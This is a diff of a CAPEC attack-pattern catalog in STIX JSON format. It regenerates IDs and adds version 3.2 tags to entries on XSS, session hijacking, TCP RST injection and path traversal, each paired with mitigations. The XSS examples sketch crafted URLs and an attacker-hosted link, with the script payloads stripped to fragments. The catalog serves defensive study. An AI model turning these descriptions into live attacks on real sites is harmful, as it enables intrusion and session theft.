"attack-pattern--ffefd84c-9e18-4f10-a2ee-0479ced15367" + "target_ref": "attack-pattern--7b38c275-4653-4cef-9a72-cb2d53a1e11e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-59-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Ideas for creating random numbers are offered by Eastlake [RFC1750]", "type": "course-of-action", - "id": "course-of-action--fc67c4dc-0399-4010-8b10-e69275b6e920" + "id": "course-of-action--6f4e1572-df35-40cd-bd86-f6ab98fb5009" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--9d87ed08-0601-4e2b-acab-529ba1b4547b", - "source_ref": "course-of-action--fc67c4dc-0399-4010-8b10-e69275b6e920", + "id": "relationship--380fdf35-ff22-493d-a810-e049e6b31310", + "source_ref": "course-of-action--6f4e1572-df35-40cd-bd86-f6ab98fb5009", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ffefd84c-9e18-4f10-a2ee-0479ced15367" + "target_ref": "attack-pattern--7b38c275-4653-4cef-9a72-cb2d53a1e11e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-59-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Encrypt the session ID if you expose it to the user. For instance session ID can be stored in a cookie in encrypted format.", "type": "course-of-action", - "id": "course-of-action--09f8a171-db86-413e-953f-7dc9f3a6bc0b" + "id": "course-of-action--20c7d57f-ca94-4776-ba01-377f4e5bf7bb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--25d2d9fa-8433-4822-8b3a-7a158e82c44b", - "source_ref": "course-of-action--09f8a171-db86-413e-953f-7dc9f3a6bc0b", + "id": "relationship--6ee48691-05c7-4a67-9070-4b6df955f667", + "source_ref": "course-of-action--20c7d57f-ca94-4776-ba01-377f4e5bf7bb", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ffefd84c-9e18-4f10-a2ee-0479ced15367" + "target_ref": "attack-pattern--7b38c275-4653-4cef-9a72-cb2d53a1e11e" }, { "name": "IP Address Blocking", "description": "An adversary performing this type of attack drops packets destined for a target IP address. The aim is to prevent access to the service hosted at the target IP address.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2017-01-12T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -34756,43 +35386,44 @@ "Consider situations of information censorship for political purposes, where regimes that prevent access to specific web services." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--81ac4003-07e0-42d5-bd33-862fff41e892" + "id": "attack-pattern--3825973d-9cb5-4c42-aae0-b9a9cec45da9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-12T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-590-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Have a large pool of backup IPs built into the application and support proxy capability in the application.", "type": "course-of-action", - "id": "course-of-action--a3315f0e-f853-4789-9882-5dbb1862055d" + "id": "course-of-action--016940da-d1ad-4819-b998-04f223a789c4" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-12T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b413d1eb-f21a-4e15-91ab-38636f4ddcbb", - "source_ref": "course-of-action--a3315f0e-f853-4789-9882-5dbb1862055d", + "id": "relationship--3f790849-a989-44bd-8e1d-d4cd541aea66", + "source_ref": "course-of-action--016940da-d1ad-4819-b998-04f223a789c4", "relationship_type": "mitigates", - "target_ref": "attack-pattern--81ac4003-07e0-42d5-bd33-862fff41e892" + "target_ref": "attack-pattern--3825973d-9cb5-4c42-aae0-b9a9cec45da9" }, { "name": "Reflected XSS", - "description": "This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is \u201creflected\u201d off a vulnerable web application and then executed by a victim's browser. The process starts with an adversary delivering a malicious script to a victim and convincing the victim to send the script to the vulnerable web application. The most common method of this is through a phishing email where the adversary embeds the malicious script with a URL that the victim then clicks on. In processing the subsequent request, the vulnerable web application incorrectly considers the malicious script as valid input and uses it to creates a reposnse that is then sent back to the victim. To launch a successful Reflected XSS attack, an adversary looks for places where user-input is used directly in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (), or the addition of event attibutes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "description": "This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is \"reflected\" off a vulnerable web application and then executed by a victim's browser. The process starts with an adversary delivering a malicious script to a victim and convincing the victim to send the script to the vulnerable web application. The most common method of this is through a phishing email where the adversary embeds the malicious script with a URL that the victim then clicks on. In processing the subsequent request, the vulnerable web application incorrectly considers the malicious script as valid input and uses it to creates a reposnse that is then sent back to the victim. To launch a successful Reflected XSS attack, an adversary looks for places where user-input is used directly in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (), or the addition of event attibutes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2017-04-15T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -34846,60 +35477,61 @@ "x_capec_abstraction": "Detailed", "x_capec_example_instances": [ "\n Consider a web application that enables or disables some of the fields of a form on the page via the use of a mode parameter provided on the query string.\n http://my.site.com/aform.html?mode=full\n The application\u2019s server-side code may want to display this mode value in the HTML page being created to give the users an understanding of what mode they are in. In this example, PHP is used to pull the value from the URL and generate the desired HTML.\n \n Notice how the value provided on the URL is used directly with no input validation performed and no output encoding in place. A maliciously crafted URL can thus be formed such that if a victim clicked on the URL, a malicious script would then be executed by the victim\u2019s browser:\n http://my.site.com/aform.html?mode=\n ", - "\n Reflected XSS attacks can take advantage of HTTP headers to compromise a victim. For example, assume a vulnerable web application called \u2018mysite\u2019 dynamically generates a link using an HTTP header such as HTTP_REFERER. Code somewhere in the application could look like:\n Test URL\"?>\n The HTTP_REFERER header is populated with the URI that linked to the currently executing page. A web site can be created and hosted by an adversary that takes advantage of this by adding a reference to the vulnerable web application. By tricking a victim into clicking a link that executes the attacker\u2019s web page, such as:\n \"http://attackerswebsite.com?\"\n The vulnerable web application (\u2018mysite\u2019) is now called via the attacker\u2019s web site, initiated by the victim\u2019s web browser. The HTTP_REFERER header will contain a malicious script, which is embedded into the page by the vulnerable application and served to the victim. The victim\u2019s web browser then executes the injected script, thus compromising the victim\u2019s machine.\n " + "\n Reflected XSS attacks can take advantage of HTTP headers to compromise a victim. For example, assume a vulnerable web application called \u2018mysite\u2019 dynamically generates a link using an HTTP header such as HTTP_REFERER. Code somewhere in the application could look like:\n Test URL\"?>\n The HTTP_REFERER header is populated with the URI that linked to the currently executing page. A web site can be created and hosted by an adversary that takes advantage of this by adding a reference to the vulnerable web application. By tricking a victim into clicking a link that executes the attacker\u2019s web page, such as:\n \"http://attackerswebsite.com?\"\n The vulnerable web application ('mysite') is now called via the attacker's web site, initiated by the victim's web browser. The HTTP_REFERER header will contain a malicious script, which is embedded into the page by the vulnerable application and served to the victim. The victim\u2019s web browser then executes the injected script, thus compromising the victim\u2019s machine.\n " ], "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--d5806cb0-79a6-4509-b955-e0c2799d196c" + "id": "attack-pattern--0296edfb-74a9-4c12-876a-a7371b585f4a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-04-15T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c148d0ca-7c77-48cb-b5e6-43b818711a99", - "source_ref": "course-of-action--54902baa-e068-4392-9d7a-3cafcf7f9406", + "id": "relationship--56d1a69b-20e6-4fd2-a301-128aadab1419", + "source_ref": "course-of-action--e87d9d25-d07b-4277-9444-7554d0e36684", "relationship_type": "mitigates", - "target_ref": "attack-pattern--d5806cb0-79a6-4509-b955-e0c2799d196c" + "target_ref": "attack-pattern--0296edfb-74a9-4c12-876a-a7371b585f4a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-04-15T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--30d68a15-e2fe-45c8-bdbd-4717d2e88016", - "source_ref": "course-of-action--49d7ee90-eea8-453f-97f5-5c9e0696c418", + "id": "relationship--69af2945-4cbd-40ee-ae13-3b78094a0c1c", + "source_ref": "course-of-action--2323dd67-cf08-4f18-9615-624b3b78eb08", "relationship_type": "mitigates", - "target_ref": "attack-pattern--d5806cb0-79a6-4509-b955-e0c2799d196c" + "target_ref": "attack-pattern--0296edfb-74a9-4c12-876a-a7371b585f4a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-04-15T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b720081c-5911-4dda-90ac-d0b088c9ee2f", - "source_ref": "course-of-action--7d341729-5128-4d92-b1ed-d2fb7fece46c", + "id": "relationship--e6cf1bc0-0177-4b9d-b823-0a767fc6a2b3", + "source_ref": "course-of-action--25de739b-9f9e-4f6f-b5d2-13d8e9e47227", "relationship_type": "mitigates", - "target_ref": "attack-pattern--d5806cb0-79a6-4509-b955-e0c2799d196c" + "target_ref": "attack-pattern--0296edfb-74a9-4c12-876a-a7371b585f4a" }, { "name": "Stored XSS", - "description": "This type of attack is a form of Cross-site Scripting (XSS) where a malicious script is persistenly \u201cstored\u201d within the data storage of a vulnerable web application. Initially presented by an adversary to the vulnerable web application, the malicious script is incorrectly considered valid input and is not properly encoded by the web application. A victim is then convinced to use the web application in a way that creates a response that includes the malicious script. This response is subsequently sent to the victim and the malicious script is executed by the victim's browser. To launch a successful Stored XSS attack, an adversary looks for places where stored input data is used in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (), or the addition of event attibutes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "description": "This type of attack is a form of Cross-site Scripting (XSS) where a malicious script is persistenly \"stored\" within the data storage of a vulnerable web application. Initially presented by an adversary to the vulnerable web application, the malicious script is incorrectly considered valid input and is not properly encoded by the web application. A victim is then convinced to use the web application in a way that creates a response that includes the malicious script. This response is subsequently sent to the victim and the malicious script is executed by the victim's browser. To launch a successful Stored XSS attack, an adversary looks for places where stored input data is used in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (), or the addition of event attibutes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2017-04-15T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -34951,66 +35583,67 @@ "An online discussion forum allows its members to post HTML-enabled messages, which can also include image tags. An adversary embeds JavaScript in the image tags of his message. The adversary then sends the victim an email advertising free goods and provides a link to the form for how to collect. When the victim visits the forum and reads the message, the malicious script is executed within the victim's browser." ], "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--4adbe9dc-4760-447f-a75d-1a501a4dff61" + "id": "attack-pattern--263be634-9e77-4c0b-891f-26a625d3b25d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-04-15T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--827f4fd6-86c8-4acf-9c22-5c9d0ea6ccae", - "source_ref": "course-of-action--54902baa-e068-4392-9d7a-3cafcf7f9406", + "id": "relationship--e3b59227-9abe-4f53-929d-a30a0f1c33a1", + "source_ref": "course-of-action--e87d9d25-d07b-4277-9444-7554d0e36684", "relationship_type": "mitigates", - "target_ref": "attack-pattern--4adbe9dc-4760-447f-a75d-1a501a4dff61" + "target_ref": "attack-pattern--263be634-9e77-4c0b-891f-26a625d3b25d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-04-15T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--34c565ef-649d-4cb5-9f3a-15a458b7849b", - "source_ref": "course-of-action--49d7ee90-eea8-453f-97f5-5c9e0696c418", + "id": "relationship--7dc19342-6d0d-4069-8beb-bf6eebf70c6e", + "source_ref": "course-of-action--2323dd67-cf08-4f18-9615-624b3b78eb08", "relationship_type": "mitigates", - "target_ref": "attack-pattern--4adbe9dc-4760-447f-a75d-1a501a4dff61" + "target_ref": "attack-pattern--263be634-9e77-4c0b-891f-26a625d3b25d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-04-15T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-592-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Ensure that all user-supplied input is validated before being stored.", "type": "course-of-action", - "id": "course-of-action--027f8f34-8890-4f8c-a70c-ba194fc12987" + "id": "course-of-action--a785e881-67df-42d6-93ba-1febf606948b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-04-15T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--2eba14f5-2dee-437f-bfb6-475e7549bdaf", - "source_ref": "course-of-action--027f8f34-8890-4f8c-a70c-ba194fc12987", + "id": "relationship--1e882b1c-a38b-4059-945d-44885804a5c7", + "source_ref": "course-of-action--a785e881-67df-42d6-93ba-1febf606948b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--4adbe9dc-4760-447f-a75d-1a501a4dff61" + "target_ref": "attack-pattern--263be634-9e77-4c0b-891f-26a625d3b25d" }, { "name": "Session Hijacking", "description": "This type of attack involves an adversary that exploits weaknesses in an application's use of sessions in performing authentication. The advarsary is able to steal or manipulate an active session and use it to gain unathorized access to the application.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2017-04-15T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -35050,40 +35683,41 @@ }, "x_capec_abstraction": "Standard", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--292e8959-f2a5-4ec9-ac43-a37ebd0b15b8" + "id": "attack-pattern--835a2a0b-1d06-4d73-a726-edf02da8dd54" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-04-15T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-593-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Properly encrypt and sign identity tokens in transit, and use industry standard session key generation mechanisms that utilize high amount of entropy to generate the session key. Many standard web and application servers will perform this task on your behalf. Utilize a session timeout for all sessions. If the user does not explicitly logout, terminate their session after this period of inactivity. If the user logs back in then a new session key should be generated.", "type": "course-of-action", - "id": "course-of-action--e4f6d719-1391-4a8a-8da2-77aec6d25e8c" + "id": "course-of-action--dcaef8bd-0231-4f2b-ae58-17cfacfcb6d5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-04-15T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--e5198e68-cbf2-4503-991e-9082eb943483", - "source_ref": "course-of-action--e4f6d719-1391-4a8a-8da2-77aec6d25e8c", + "id": "relationship--9b940f35-fced-43d4-b905-57b91eb79f96", + "source_ref": "course-of-action--dcaef8bd-0231-4f2b-ae58-17cfacfcb6d5", "relationship_type": "mitigates", - "target_ref": "attack-pattern--292e8959-f2a5-4ec9-ac43-a37ebd0b15b8" + "target_ref": "attack-pattern--835a2a0b-1d06-4d73-a726-edf02da8dd54" }, { "name": "Traffic Injection", "description": "An adversary injects traffic into the target's network connection. The adversary is therefore able to degrade or disrupt the connection, and potentially modify the content. This is not a flooding attack, as the adversary is not focusing on exhausting resources. Instead, the adversary is crafting a specific input to affect the system in a particular way.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2017-01-03T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -35116,15 +35750,16 @@ }, "x_capec_abstraction": "Meta", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--7fda3a78-1986-42e8-82c9-11491dcb8ca6" + "id": "attack-pattern--a206f37f-7272-4125-af6c-575e01231af5" }, { "name": "Connection Reset", "description": "In this attack pattern, an adversary injects a connection reset packet to one or both ends of a target's connection. The attacker is therefore able to have the target and/or the destination server sever the connection without having to directly filter the traffic between them.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2017-01-04T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -35145,15 +35780,16 @@ ], "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--c73c0b12-e117-4d0e-80a9-0d076d095d85" + "id": "attack-pattern--405493fa-cac2-4b87-bbe1-111562460e7e" }, { "name": "TCP RST Injection", "description": "An adversary injects one or more TCP RST packets to a target after the target has made a HTTP GET request. The goal of this attack is to have the target and/or destination web server terminate the TCP connection.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2017-01-03T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -35179,15 +35815,16 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--15bf495d-ebc7-4a84-aa40-2fbb29a0dce1" + "id": "attack-pattern--83972adb-a130-4d41-8c1d-f3d603b7311e" }, { "name": "Absolute Path Traversal", "description": "An adversary with access to file system resources, either directly or via application logic, will use various file absolute paths and navigation mechanisms such as \"..\" to extend their range of access to inappropriate areas of the file system. The goal of the adversary is to access directories and files that are intended to be restricted from their access.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2017-01-06T00:00:00.000Z", "modified": "2017-01-06T00:00:00.000Z", @@ -35229,171 +35866,172 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--05d58e6b-ecf0-4b76-a475-197bd4efb60e" + "id": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-06T00:00:00.000Z", "modified": "2017-01-06T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--518383aa-44ae-49e4-96a3-52731032ba0d", - "source_ref": "course-of-action--1fb1a11a-10a7-482c-9ed6-51b44f703314", + "id": "relationship--a1fd5ca5-0589-4c9d-8841-bf0640514b20", + "source_ref": "course-of-action--7d9210eb-2a81-42e2-91a1-6bae4c65ca16", "relationship_type": "mitigates", - "target_ref": "attack-pattern--05d58e6b-ecf0-4b76-a475-197bd4efb60e" + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-06T00:00:00.000Z", "modified": "2017-01-06T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--83913335-0006-4349-a10f-acff1464b687", - "source_ref": "course-of-action--c5869033-4f79-40b2-b258-ba163252e1fb", + "id": "relationship--2b95a8fd-34cc-488e-b836-7fd91b9e7738", + "source_ref": "course-of-action--59f6f5cc-aab7-46d0-bf72-761b5ef7c45d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--05d58e6b-ecf0-4b76-a475-197bd4efb60e" + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-06T00:00:00.000Z", "modified": "2017-01-06T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--2d1bd493-2fa6-41e2-a9d3-062fe2724caf", - "source_ref": "course-of-action--08f4e02a-825e-40af-9045-9c00f57141b8", + "id": "relationship--b2f2e038-a80c-4cf3-b3b0-bfc4279080a0", + "source_ref": "course-of-action--60e5864c-2b6e-4ac0-8bdd-82ecc4047c38", "relationship_type": "mitigates", - "target_ref": "attack-pattern--05d58e6b-ecf0-4b76-a475-197bd4efb60e" + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-06T00:00:00.000Z", "modified": "2017-01-06T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--6c6f8a72-e6ff-4f7e-9bc4-250a6daf9fe9", - "source_ref": "course-of-action--ec6aafde-0dce-4ca1-9066-165a5e8e182d", + "id": "relationship--58ee4fe8-4fab-4910-b709-68fb70ff981b", + "source_ref": "course-of-action--15af2ba6-0fe3-42ae-aa07-efeaba06d2d6", "relationship_type": "mitigates", - "target_ref": "attack-pattern--05d58e6b-ecf0-4b76-a475-197bd4efb60e" + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-06T00:00:00.000Z", "modified": "2017-01-06T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--71d7bf63-9532-406e-866d-d6bac5c797d0", - "source_ref": "course-of-action--50263c48-f3f5-4eca-b2b3-24bd8021be9d", + "id": "relationship--f01e1863-7f77-4d86-a3dd-42542b82e1f8", + "source_ref": "course-of-action--9473c9f9-f260-4e7d-bbf6-bc227db41261", "relationship_type": "mitigates", - "target_ref": "attack-pattern--05d58e6b-ecf0-4b76-a475-197bd4efb60e" + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2017-01-06T00:00:00.000Z", "modified": "2017-01-06T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + 